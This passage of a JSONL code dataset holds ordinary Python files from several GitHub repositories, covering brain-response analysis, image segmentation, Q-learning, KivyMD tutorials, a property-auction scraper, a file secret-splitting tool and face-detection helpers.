ytest = load_model_performance(\n            model, output_root=output_dir, measure=\"pred\"\n        )\n        if masking == \"sig\":\n            pvalues = load_model_performance(\n                model, output_root=output_dir, measure=\"pvalue\"\n            )\n            sig_mask = pvalues <= 0.05\n\n            sample_corrs = [\n                metric(ytest[:, sig_mask][i, :], yhat[:, sig_mask][i, :])\n                for i in range(ytest.shape[0])\n            ]\n\n        else:\n            roi = np.load(\n                \"%s/output/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n                % (output_dir, subj, subj, masking)\n            )\n            roi_mask = roi > 0\n            sample_corrs = [\n                metric(ytest[:, roi_mask][i, :], yhat[:, roi_mask][i, :])\n                for i in range(ytest.shape[0])\n            ]\n\n        if measure == \"corrs\":\n            sample_corrs = np.array(sample_corrs)[:, 0]\n        np.save(\n            \"%s/output/clip/%s_sample_%s_%s.npy\"\n            % (output_dir, model, measure, masking),\n            sample_corrs,\n        )\n\n    return 
sample_corrs\n","repo_name":"ariaaay/clip2brain","sub_path":"src/util/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"36859811753","text":"# Download and import the MIT 6.S191 package\nimport mitdeeplearning as mdl\nimport numpy as np\nimport json\n\n\n\ndef main():\n songs = mdl.lab1.load_training_data()\n\n # # Print one of the songs to inspect it in greater detail!\n # example_song = songs[0]\n # print(\"\\nExample song: \")\n # print(example_song)\n\n # Join our list of song strings into a single string containing all songs\n \n songs_joined = \"\\n\\n\".join(songs) \n\n # Find all unique characters in the joined string\n \n vocab = sorted(set(songs_joined))\n # print(\"There are\", len(vocab), \"unique characters in the dataset\")\n # # create two lookup tables\n # 1. text to integers\n \n char2idx = {u:i for i, u in enumerate(vocab)}\n # json.dump(char2idx, open(\"../input/char2idx.json\",'w'))\n # Create a mapping from indices to characters. This is\n # the inverse of char2idx and allows us to convert back\n # from unique index to the character in our vocabulary.\n \n idx2char = np.array(vocab)\n # np.savetxt('../input/idx2char.txt', idx2char, fmt='%s' )\n\n # print('{')\n # for char,_ in zip(char2idx, range(20)):\n # print(' {:4s}: {:3d},'.format(repr(char), char2idx[char]))\n # print(' ...\\n}')\n\nif __name__ == \"__main__\" :\n main()\n\n\n","repo_name":"osvamsi/Music_Generation_LSTMS","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12357346972","text":"import joblib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\nfrom spectral_tiffs import read_mtiff, read_stiff, write_mtiff, write_stiff\r\nimport numpy as np\r\nfrom skimage import color\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import jaccard_score\r\n\r\ndef analyze(image):\r\n model1 = joblib.load('C:/Users/Admin/Documents/idp/OneDrive_1_3-13-2021/Python-scripts/gd_model.pkl')\r\n\r\n\r\n Blue_dye = [0,255,255]\r\n Red_dye = [128,0,0]\r\n ICG = [0,255,0]\r\n Stroma_ICG= [255,255,255]\r\n Stroma = [128,128,128]\r\n Umbilical_cord = [255,242,0]\r\n Suture = [128,128,0]\r\n Artery_ICG = [34,177,76]\r\n Vein = [63,72,204]\r\n Artery = [237,28,36]\r\n non = [0,0,0]\r\n colors=[non, Blue_dye, Red_dye, ICG, Stroma_ICG, Stroma, Umbilical_cord,\r\n Suture, Artery_ICG, Vein, Artery]\r\n lbl_handles=[\"non\", \"Blue_dye\", \"Red_dye\", \"ICG\", \"Stroma_ICG\", \"Stroma\", \"Umbilical_cord\",\r\n \"Suture\", \"Artery_ICG\", \"Vein\", \"Artery\"]\r\n v = np.zeros((1024,1024,3))\r\n \r\n \r\n \r\n img = \"C:/Users/Admin/Documents/idp/OneDrive_1_3-13-2021/prediction/upper_6_icg.tif\"\r\n #img = image\r\n spim,w,rgb,meta = read_stiff(img)\r\n \r\n sx = []\r\n for i in range (0,1024):\r\n for j in range (0,1024):\r\n temp = []\r\n for z in range (0,38):\r\n temp.append(spim[i,j,z])\r\n sx.append(temp)\r\n \r\n \r\n \r\n \r\n prediction = model1.predict(np.array(sx))\r\n prediction = prediction.reshape((1024,1024))\r\n for i in range (prediction.shape[0]):\r\n for j in range (prediction.shape[1]):\r\n if (prediction[i,j]>0):\r\n v[i,j]=colors[prediction[i,j]]\r\n else:\r\n 
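# no class was predicted for this pixel, so keep the original RGB value\r\n                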
v[i,j]=rgb[i,j]\r\n    v = v/255\r\n    labels = np.unique(prediction)\r\n    patches = []\r\n    for i in range(labels.shape[0]):\r\n        c = np.array((colors[labels[i]]))/255\r\n        patch= mpatches.Patch(color=c, label=lbl_handles[labels[i]])\r\n        patches.append(patch)\r\n    px = 1/plt.rcParams['figure.dpi']\r\n    plt.figure(figsize=(512*px, 512*px))\r\n    plt.imshow(v)\r\n    plt.legend(handles=patches, fontsize='small',loc='upper left',bbox_to_anchor=(1, 1))\r\n    #plt.show()\r\n    path = img+'_mask.png'\r\n    plt.savefig(path,bbox_inches=\"tight\")\r\n\r\n    return path\r\n","repo_name":"lidiatekeste2312/Placenta-Spectral-Image-Segmentation","sub_path":"GD_prediction.py","file_name":"GD_prediction.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21403545197","text":"import gym\nimport random\nimport numpy as np\n\nenvironment = gym.make(\"FrozenLake-v1\", is_slippery=False, render_mode='human')\nenvironment.reset()\nenvironment.render()\n\nqtable = np.zeros((16, 4))\n\n# Alternatively, the gym library can also directly\n# give us the number of states and actions using\n# \"env.observation_space.n\" and \"env.action_space.n\"\nnb_states = environment.observation_space.n # = 16\nnb_actions = environment.action_space.n # = 4\nqtable = np.zeros((nb_states, nb_actions))\n\n# Let's see how it looks\nprint('Q-table =')\nprint(qtable)\n\nrandom.choice([\"LEFT\", \"DOWN\", \"RIGHT\", \"UP\"])\n\nenvironment.action_space.sample()\n\nenvironment.step(2)\nenvironment.render()\n\n# 1. Randomly choose an action using action_space.sample()\naction = environment.action_space.sample()\n\n# 2. Implement this action and move the agent in the desired direction\nnew_state, reward, terminated, truncated, info = environment.step(action)\n\n# Display the results (reward and map)\nenvironment.render()\nprint(f'Reward = {reward}')\n\n","repo_name":"Trace2333/QlearningByTrace","sub_path":"ql_test.py","file_name":"ql_test.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29743185325","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\"\"\"\ndef print_hi(name):\n    # Use a breakpoint in the code line below to debug your script.\n    print(f'Hi, {name}')  # Press Ctrl+F8 to toggle the breakpoint.\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    print_hi('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\n\"\"\"\n\n# https://github.com/attreyabhatt/KivyMD-Basics\n\n'''\nfrom kivy.app import App\nfrom kivy.uix.textinput import TextInput\n\n\nclass MainApp(App):\n    def build(self):\n        value = TextInput(text=\"Enter value here\")\n        return value\n\nMainApp().run()\n\n'''\n# LABELS\n\n\"\"\"\nfrom kivymd.app import MDApp\nfrom kivymd.uix.label import MDLabel, MDIcon\nfrom kivymd.font_definitions import theme_font_styles\n\n\nclass DemoApp(MDApp):\n    def build(self):\n        # halign = horizontal align\n\n        label = MDLabel(text=\"Hello world\", halign=\"center\", theme_text_color=\"Error\",\n                        font_style=\"Subtitle2\")\n\n        # label = MDLabel(text=\"Hello world\", halign=\"center\",theme_text_color=\"Custom\",\n        #                 text_color=(0,0,1,1))\n\n        # label = MDIcon(icon=\"language-python\", halign=\"center\")\n        return label\n\n\nDemoApp().run()\n\n\"\"\"\n\n# 
BUTTONS\n\n'''\nfrom kivy.app import App\nfrom kivy.metrics import dp\nfrom kivy.uix.behaviors import TouchRippleBehavior\nfrom kivy.uix.button import Button\nfrom kivy.lang import Builder\n\n\nKV = \"\"\"\n:\n ripple_color: 0, 0, 0, .2\n background_color: 0, 0, 0, 0\n color: root.primary_color\n canvas.before:\n Color:\n rgba: root.primary_color\n Line:\n width: 1\n rectangle: (self.x, self.y, self.width, self.height)\nScreen:\n canvas:\n Color:\n rgba: 0.9764705882352941, 0.9764705882352941, 0.9764705882352941, 1\n Rectangle:\n pos: self.pos\n size: self.size\n\"\"\"\n\n\nclass RectangleFlatButton(TouchRippleBehavior, Button):\n primary_color = [\n 0.12941176470588237,\n 0.5882352941176471,\n 0.9529411764705882,\n 1\n ]\n\n def on_touch_down(self, touch):\n collide_point = self.collide_point(touch.x, touch.y)\n if collide_point:\n touch.grab(self)\n self.ripple_show(touch)\n return True\n return False\n\n def on_touch_up(self, touch):\n if touch.grab_current is self:\n touch.ungrab(self)\n self.ripple_fade()\n return True\n return False\n\n\nclass MainApp(App):\n def build(self):\n screen = Builder.load_string(KV)\n screen.add_widget(\n RectangleFlatButton(\n text=\"Hello, World\",\n pos_hint={\"center_x\": 0.5, \"center_y\": 0.5},\n size_hint=(None, None),\n size=(dp(110), dp(35)),\n ripple_color=(0.8, 0.8, 0.8, 0.5),\n )\n )\n return screen\n\n\nMainApp().run()\n\n'''\n\n# TEXT FIELD\n\n\"\"\"\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.textfield import MDTextField\nfrom kivy.core.window import Window\n\nWindow.size = (360, 600)\n\n\nclass DemoApp(MDApp):\n def build(self):\n screen = Screen()\n\n username = MDTextField(text=\"Enter Weight\",\n helper_text=\"This will disappear when you click off\",\n helper_text_mode=\"on_focus\",\n pos_hint={'center_x': 0.5, 'center_y': 0.5},\n size_hint_x=None, width=200)\n screen.add_widget(username)\n return screen\n\n\nDemoApp().run()\n\n\"\"\"\n# THEMES\n\n'''\n1) What is a theme?\n2) primary_palette on buttons\n3) Color Options in primary_palette - Available options are: ‘Red’, ‘Pink’, ‘Purple’, ‘DeepPurple’, ‘Indigo’, ‘Blue’, ‘LightBlue’, ‘Cyan’, ‘Teal’, ‘Green’, ‘LightGreen’, ‘Lime’, ‘Yellow’, ‘Amber’, ‘Orange’, ‘DeepOrange’, ‘Brown’, ‘Gray’, ‘BlueGray’.\n4) Primary hue option - ‘50’, ‘100’, ‘200’, ‘300’, ‘400’, ‘500’, ‘600’, ‘700’, ‘800’, ‘900’, ‘A100’, ‘A200’, ‘A400’, ‘A700’.\n5) theme_style - Dark or Light two options\n'''\n\n'''\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.button import MDRectangleFlatButton\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n self.theme_cls.primary_palette = \"Orange\"\n self.theme_cls.primary_hue = \"100\"\n self.theme_cls.theme_style = \"Dark\"\n screen = Screen()\n btn_flat = MDRectangleFlatButton(text='Hello World',\n pos_hint={'center_x': 0.5, 'center_y': 0.5})\n screen.add_widget(btn_flat)\n return screen\n\n\nDemoApp().run()\n\n'''\n\n# LIST\n\n\"\"\"\n1) Example of List - https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/lists.png\n2) Create -> OneLineListItem\nhttps://raw.githubusercontent.com/HeaTTheatR/KivyMD-data/master/gallery/kivymddoc/lists.gif\n\n3) Flow to create a list : OneLineListItem-> MDList -> ScrollView -> Screen\n4) Create a for loop to add more items\n5) Create a TwoLineListItem(secondary_text), ThreeLineListItem (tertiary_text)\n\n- Flow to Icon/Avatar list : IconLeftWidget/IconRightWidget -> OneLineListItem-> MDList -> ScrollView -> Screen\n6) Add a OneLineIconListItem\n7) 
Add a OneLineAvatarListItem\n\n8) Use the Builder method to create a list\n\n\"\"\"\n\n'''\n# VER 1\n\nfrom kivymd.app import MDApp\nfrom kivy.lang import Builder\nfrom kivymd.uix.list import OneLineListItem\n\nlist_helper = \"\"\"\nScreen:\n ScrollView:\n MDList:\n id: container\n\n\"\"\"\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n screen = Builder.load_string(list_helper)\n return screen\n\n def on_start(self):\n for i in range(20):\n item = OneLineListItem(text='Item ' + str(i))\n self.root.ids.container.add_widget(item)\n\n\nDemoApp().run()\n\n'''\n\n# VER 2\n\n\"\"\"\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.list import OneLineListItem, MDList, TwoLineListItem, ThreeLineListItem\nfrom kivymd.uix.list import OneLineIconListItem, IconLeftWidget\nfrom kivy.uix.scrollview import ScrollView\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n screen = Screen()\n\n # Creating a Simple List\n scroll = ScrollView()\n\n list_view = MDList()\n for i in range(20):\n\n # items = ThreeLineListItem(text=str(i) + ' item',\n # secondary_text='This is ' + str(i) + 'th item',\n # tertiary_text='hello')\n\n icons = IconLeftWidget(icon=\"android\")\n items = OneLineIconListItem(text=str(i) + ' item')\n items.add_widget(icons)\n list_view.add_widget(items)\n\n scroll.add_widget(list_view)\n # End List\n\n screen.add_widget(scroll)\n return screen\n\n\nDemoApp().run()\n\n\"\"\"\n\n# TOOLBARS\n# https://www.youtube.com/watch?v=iicfEqNBb-4\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\n\nWindow.size = (300, 500)\n\nscreen_helper = \"\"\"\nScreen:\n BoxLayout:\n orientation: 'vertical'\n MDToolbar:\n title: 'Demo Application'\n left_action_items: [[\"menu\", lambda x: app.navigation_draw()]]\n right_action_items: [[\"dots-vertical\", lambda x: app.callback()], [\"clock\", lambda x: app.callback_2()]]\n elevation:5\n\n MDLabel:\n text: 'hello world'\n halign: 'center'\n\"\"\"\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n self.theme_cls.primary_palette = \"Red\"\n screen = Builder.load_string(screen_helper)\n\n return screen\n\n def navigation_draw(self):\n print(\"Navigation\")\n\n\nDemoApp().run()","repo_name":"vlad4canada/KivyProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37666265770","text":"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('homepage.urls')),\n path('service/', include('servicepage.urls')),\n path('contact/', include('contactpage.urls')),\n path('blog/', include('blogpage.urls')),\n path('ckeditor/', include('ckeditor_uploader.urls')),\n \n]\n\nif settings.DEBUG:\n #urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_URL)\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","repo_name":"hosenmdaltaf/beauty_fasion","sub_path":"beauty_fasion_main/beauty_fasion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40186351746","text":"from multiprocessing import Process\nfrom multiprocessing import Queue\nfrom time 
import sleep\na=0\n\ndef task1(q):\n global a\n q.put(10)\n for a in range(10):\n a = a + 1\n print('--', a)\n\n\n\ndef task2(q):\n global a\n\n for a in range(10):\n a = a + 2\n print('--', a)\n q.put(10)\n\n\nif __name__ == '__main__':\n q=Queue(maxsize=10)\n # print(q.get(block=False))\n # print(q.get())\n p1=Process(target=task1,args=(q,))\n p1.start()\n p1.join()\n print(q.get(block=False))\n p2=Process(target=task2,args=(q,))\n p2.start()\n # p2.join()\n print(q.get())\n # print(a.bit_length())\n # p2.join()\n # while 1:\n # print(q.get())\n\n","repo_name":"xiaolcqbug/aiai","sub_path":"Add/进程间通信.py","file_name":"进程间通信.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37697305677","text":"import json\nimport os\nfrom miner_text_generator import extract_text_by_page\ndef export_as_json(pdf_path, json_path):\n filename=os.path.splitext(os.path.basename(pdf_path))[0]\n data={}\n for line in extract_text_by_page(pdf_path):\n command,description=line.strip().split(None, 1)\n data[command]=description.strip()\n out_file = open(json_path,'w')\n json.dump(data, out_file)\nif __name__ == '__main__':\n pdf_path = 'Interview_sample_data.pdf'\n json_path = 'sample_data.json'\n export_as_json(pdf_path, json_path)","repo_name":"SreevidyaVK/Techworld","sub_path":"myprogram.py","file_name":"myprogram.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18636683908","text":"import csv\nimport json\nimport openpyxl\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom auction_scraper_base import get_property_type, prepare_price, get_bedroom, get_tenure, parse_postal_code\n\n\nclass NetworkAuction:\n driver: webdriver.Chrome\n\n def __init__(self):\n service = Service(executable_path=ChromeDriverManager().install())\n self.driver = webdriver.Chrome(service=service)\n\n def property_scraper(self, property_link):\n self.driver.get(property_link)\n print(property_link)\n\n image = self.driver.find_element(By.XPATH, \"(//img[@alt='Lot Image'])[1]\")\n image_link = image.get_attribute(\"src\")\n\n guidePrice = self.driver.find_element(By.XPATH, \"//span[contains(@class,'current-bid ')]\").text\n price, currency = prepare_price(guidePrice)\n\n description = self.driver.find_element(By.XPATH, \"(//div[contains(@class,'lot-data-text')])[1]\").text\n number_of_bedrooms = get_bedroom(description)\n\n address = self.driver.find_element(By.XPATH, \"(//h1[@class='h3'])[1]\").text\n postal_code = parse_postal_code(address)\n\n tenure = get_tenure(description)\n\n title = self.driver.find_element(\n By.XPATH, \"//div[@class='lot-highlights']\").text\n\n property_type = get_property_type(description)\n\n if property_type == \"other\":\n property_type = get_property_type(description)\n if not tenure:\n tenure = get_tenure(description)\n\n data_hash = {\n \"price\": price,\n \"currency_type\": currency,\n \"picture_link\": image_link,\n \"property_description\": description,\n \"property_link\": property_link,\n \"address\": address,\n \"postal_code\": postal_code,\n \"auction_venue\": \"online\",\n \"source\": \"pugh-auctions\",\n \"property_type\": property_type,\n \"number_of_bedrooms\": number_of_bedrooms,\n \"tenure\": tenure,\n }\n return data_hash\n\n def 
properties_scraper(self):\n auction_divs = []\n button = self.driver.find_element(By.XPATH, \"//a[contains(text(),'All')]\")\n button.click()\n for auction_divs_href in self.driver.find_elements(\n By.XPATH, \"//div[contains(@class,'auction-card')]/a[contains(.,'Find out more')]\"):\n auction_property = auction_divs_href.get_attribute('href')\n print(auction_property)\n auction_divs.append(auction_property)\n\n workbook = openpyxl.Workbook()\n worksheet = workbook.active\n csv_fh = open('sdl_auction_sel.csv', mode='w', newline='', encoding='utf8')\n json_fh = open(\"sdl_auction_sel.json\", \"w\", encoding='utf8')\n csv_writer = csv.writer(csv_fh)\n\n list_dict = []\n\n for property_link in auction_divs:\n result_dict = self.property_scraper(property_link)\n result_list = list(result_dict.values())\n worksheet.append(result_list)\n csv_writer.writerow(result_list)\n list_dict.append(result_dict)\n workbook.save(\"sdl_auction_sel.xlsx\")\n\n json_result = json.dumps(list_dict)\n json_fh.write(json_result)\n json_fh.close()\n workbook.close()\n csv_fh.close()\n\n def run(self):\n self.driver.get(\n \"https://www.sdlauctions.co.uk/property-auctions/timed-auctions/\")\n self.properties_scraper()\n\n\nauction = NetworkAuction()\nauction.run()\n","repo_name":"sheikhzain260/Auction-Scrapers-","sub_path":"Sdl Auctions/sdl_auction_sel.py","file_name":"sdl_auction_sel.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31931680731","text":"from __future__ import division\nfrom past.utils import old_div\nfrom SloppyCell.ReactionNetworks import *\n\n# Modifications to SBML...\n# Removed function LD, because it used 'ceil' which is not something we can deal\n# with\n# Replaced variable value_of_LD with light (more descriptive name)\n# Replaced calls to LD with light\n# Removed timeOfDay and dayLength variables\nnet = IO.from_SBML_file('BIOMD055-noceil.xml', 'base')\nnet.compile()\n\n# Set up a network that will switch light on/off at 12 hour intervals.\nnet1212 = net.copy('net_1212')\nnet1212.set_var_ic('light', 1)\nnet1212.add_parameter('turntime', 12, is_constant=False)\nnet1212.add_event('light_switch', 'gt(time, turntime)', {'light': '1-light',\n 'turntime': '12+time'})\nmutant_net = net1212.copy('cca1lhy')\nmutant_net.set_var_ic('p1', old_div(net.get_var_ic('p1'),1000))\n\n# Run to the limit cycle \ntraj = Dynamics.integrate(net1212, [0, 24*10])\nnet1212.set_var_ics(traj.get_var_vals_index(-1))\n# Go to limit cycle\ntraj = Dynamics.integrate(mutant_net, [0, 24*10])\nmutant_net.set_var_ics(traj.get_var_vals_index(-1))\n\nnet_12L_12D_12L_D = net1212.copy('net_12L_12D_12L_D')\nnet_12L_12D_12L_D.remove_component('light_switch')\nnet_12L_12D_12L_D.remove_component('turntime')\nnet_12L_12D_12L_D.set_var_ic('light', 1)\nnet_12L_12D_12L_D.add_event('off_12', 'gt(time, 12)', {'light': 0})\nnet_12L_12D_12L_D.add_event('on_24', 'gt(time, 24)', {'light': 1})\nnet_12L_12D_12L_D.add_event('off_36', 'gt(time, 36)', {'light': 0})\n\n# Run for twelve more hours to get to the dark part of the cycle\ntraj = Dynamics.integrate(net1212, [0, 12])\nnet1212.set_var_ics(traj.get_var_vals_index(-1))\n\nnet_12D_L = net1212.copy('net_12D_L')\nnet_12D_L.remove_component('light_switch')\nnet_12D_L.remove_component('turntime')\nnet_12D_L.set_var_ic('light', 0)\nnet_12D_L.add_event('on_12', 'gt(time, 12)', {'light': 1})\n\nmutant_12L_12D_12L_D = 
mutant_net.copy('mutant_12L_12D_12L_D')\nmutant_12L_12D_12L_D.remove_component('light_switch')\nmutant_12L_12D_12L_D.remove_component('turntime')\nmutant_12L_12D_12L_D.set_var_ic('light', 1)\nmutant_12L_12D_12L_D.add_event('off_12', 'gt(time, 12)', {'light': 0})\nmutant_12L_12D_12L_D.add_event('on_24', 'gt(time, 24)', {'light': 1})\nmutant_12L_12D_12L_D.add_event('off_36', 'gt(time, 36)', {'light': 0})\ntrajm = Dynamics.integrate(mutant_12L_12D_12L_D, [0, 96])\n\n# Run for twelve more hours to get to the dark part of the cycle\ntraj = Dynamics.integrate(mutant_net, [0, 12])\nmutant_net.set_var_ics(traj.get_var_vals_index(-1))\n\nmutant_12D_L = mutant_net.copy('mutant_12D_L')\nmutant_12D_L.remove_component('light_switch')\nmutant_12D_L.remove_component('turntime')\nmutant_12D_L.set_var_ic('light', 0)\nmutant_12D_L.add_event('on_12', 'gt(time, 12)', {'light': 1})\n\nnetworks = [net_12L_12D_12L_D, net_12D_L, mutant_12L_12D_12L_D, mutant_12D_L]\nint_times = [(0, 96), (0, 96), (0, 48), (0,48)]\n","repo_name":"GutenkunstLab/SloppyCell","sub_path":"Example/Gutenkunst2007/Locke_2005/Nets.py","file_name":"Nets.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"40236627851","text":"import click\nimport secrets\n\n@click.group()\ndef cli():\n    pass\n\n\n@cli.command()\n@click.option('-n', type=int, required=True, help='Number of horcruxes to create')\n@click.option('-k', type=int, required=True, help='Number of horcruxes to recover original')\n@click.option('-o', default='./output', type=click.Path(exists=False), help='Destination directory')\n@click.option('--block-size', type=int, help=\"Size of block to operate on. Larger values are faster, but may result in horcruxes of different sizes. Defaults to 1/10th of file size\")\n@click.argument('file', type=click.Path(exists=True, readable=True))\ndef split(file, n: int, k: int, o, block_size):\n    \"\"\"Splits a file into horcruxes\"\"\"\n    import os\n    os.makedirs(o, exist_ok=True)\n\n    if k > n:\n        print(\"WARN: k > n. Data will be irrecoverable. What a waste of CPU cycles.\")\n\n    from horcruxes.cruxcreator import HorcruxCreateManager\n    hcm = HorcruxCreateManager(file, n, k, block_size, o)\n    hcm.write_headers()\n    hcm.write()\n\n    print(\"Operation successful.\")\n\n@cli.command()\n@click.option('-o', type=click.Path(exists=False), required=True, help='Destination directory')\n@click.argument('files-or-dir', type=click.Path(exists=True, readable=True), nargs=-1)\ndef bind(files_or_dir, o):\n    \"\"\"Binds horcruxes back into the original. 
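Recovery needs at least k of the n horcruxes produced by split. 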
files-or-dir may be a list of files or a directory containing a list of horcrux files\"\"\"\n    import os\n    if os.path.dirname(o): os.makedirs(os.path.dirname(o), exist_ok=True)\n\n    from horcruxes.cruxreverser import HorcruxReverseManager\n    files = files_or_dir\n    if len(files_or_dir) == 1 and os.path.isdir(files_or_dir[0]):\n        files = [os.path.join(files_or_dir[0], file) for file in os.listdir(files_or_dir[0])]\n\n    try:\n        hrm = HorcruxReverseManager(files, o)\n        hrm.decrypt()\n    except ValueError as e:\n        import sys\n        print(f\"Invalid arguments: {e}\", file=sys.stderr)\n    else:\n        print(\"Operation successful.\")\n\nif __name__ == '__main__':\n    cli()","repo_name":"X-yl/horcruxes","sub_path":"horcruxes/crux.py","file_name":"crux.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"28721254409","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef get_data(group, path):\n    '''\n    Creates a list of tuples, each with an image name and its bounding box statistics.\n    Input:\n        group: what picture group we want, e.g. couples\n        path: path to the wider_faces_train_bbx_gt.txt\n    Output:\n        data: list of tuples of data (filename, bbs (list itself))\n    '''\n    # Based on https://towardsdatascience.com/how-do-you-train-a-face-detection-model-a60330f15fd5\n\n    f = open(path, 'r')\n    file = f.readlines()\n    data = []\n    count = 0\n\n    for i in file:\n        # Grab the files for specific group\n        if group in i:\n\n            # image name and remove \\n\n            filename = file[count]\n            filename = filename[:-1]\n\n            # get bounding boxes\n            numFaces = int(file[count + 1])\n            bbsStart = count + 2\n            boxes = []\n\n            occ = 0\n            pose = 0\n            ill = 0\n            for j in range(0, numFaces):\n                face = file[bbsStart + j]\n                bbs = face.split(' ')\n                ill = max(ill, int(bbs[6]))\n                occ = max(occ, int(bbs[8]))\n                pose = max(pose, int(bbs[9]))\n                bbs = bbs[:4]\n                bbs = [int(k) for k in bbs]\n                boxes.append(bbs)\n\n            # Create a tuple with file name and list of bounding boxes, and save\n            if occ != 0 or pose != 0 or ill != 0:\n                pass\n            else:\n                temp = (filename, boxes)\n                data.append(temp)\n\n        count += 1\n    return data\n\n\ndef min_dist(x, y, boxes):\n    '''\n    Finding the nearest bounding box (if not in order)\n    Input:\n        x: detected starting x\n        y: detected starting y\n        boxes: list of all the bounding boxes for the image\n    '''\n    mindist = 1e10  # arbitrary large number\n\n    for k in range(0, len(boxes)):\n        x1 = boxes[k][0]\n        y1 = boxes[k][1]\n        dist = np.sqrt((x1 - x) ** 2 + (y1 - y) ** 2)  # Euclidean distance\n        if dist < mindist:\n            mindist = dist\n            mink = k\n\n    return mink\n\n\ndef get_iou(bb1, bb2):\n    \"\"\"\n    https://stackoverflow.com/questions/25349178/calculating-percentage-of-bounding-box-overlap-for-image-detector-evaluation\n    Calculate the Intersection over Union (IoU) of two bounding boxes.\n\n    Parameters\n    ----------\n    bb1 : dict\n        Keys: {'x1', 'x2', 'y1', 'y2'}\n        The (x1, y1) position is at the top left corner,\n        the (x2, y2) position is at the bottom right corner\n    bb2 : dict\n        Keys: {'x1', 'x2', 'y1', 'y2'}\n        The (x1, y1) position is at the top left corner,\n        the (x2, y2) position is at the bottom right corner\n\n    Or: bb1 is a tuple with data (x1, y1, x2, y2)\n        bb2 is a tuple with data (x1, y1, x2, y2)\n\n    Returns\n    -------\n    float\n        in [0, 1]\n\n    
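Example\n    -------\n    (Added illustration, not in the original.) bb1 = (0, 0, 10, 10) and\n    bb2 = (5, 5, 15, 15) intersect in a 5x5 square, so\n    IoU = 25 / (100 + 100 - 25) = 1/7, roughly 0.143.\n    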
\"\"\"\n    # determine the coordinates of the intersection rectangle\n\n    x_left = max(bb1[0], bb2[0])\n    y_top = max(bb1[1], bb2[1])\n    x_right = min(bb1[2], bb2[2])\n    y_bottom = min(bb1[3], bb2[3])\n\n    if x_right < x_left or y_bottom < y_top:\n        return 0.0\n\n    # The intersection of two axis-aligned bounding boxes is always an\n    # axis-aligned bounding box\n    intersection_area = (x_right - x_left) * (y_bottom - y_top)\n\n    # compute the area of both AABBs\n    bb1_area = (bb1[2] - bb1[0]) * (bb1[3] - bb1[1])\n    bb2_area = (bb2[2] - bb2[0]) * (bb2[3] - bb2[1])\n\n    # compute the intersection over union by taking the intersection\n    # area and dividing it by the sum of prediction + ground-truth\n    # areas - the intersection area\n    iou = intersection_area / float(bb1_area + bb2_area - intersection_area)\n    \n#    if iou >= 0.35:\n#        print(\"iou > .35\")\n#        iou = 1\n    assert iou >= 0.0\n    assert iou <= 1.0\n    return iou\n\n\ndef plot_results(result, title):\n    acc = []\n    for i in range(0, len(result)):\n        acc.extend(result[i][1])\n\n    acc_arr = np.array(acc)\n    avg_acc = np.mean(acc_arr)\n\n    fig = plt.figure()\n    ax = fig.add_axes([0, 0, 1, 1])\n\n    idx = 0\n    for i in range(0, len(result)):\n        ar = result[i][1]\n        plt.scatter(range(idx, idx + len(ar)), ar)\n        idx = idx + len(ar)\n\n    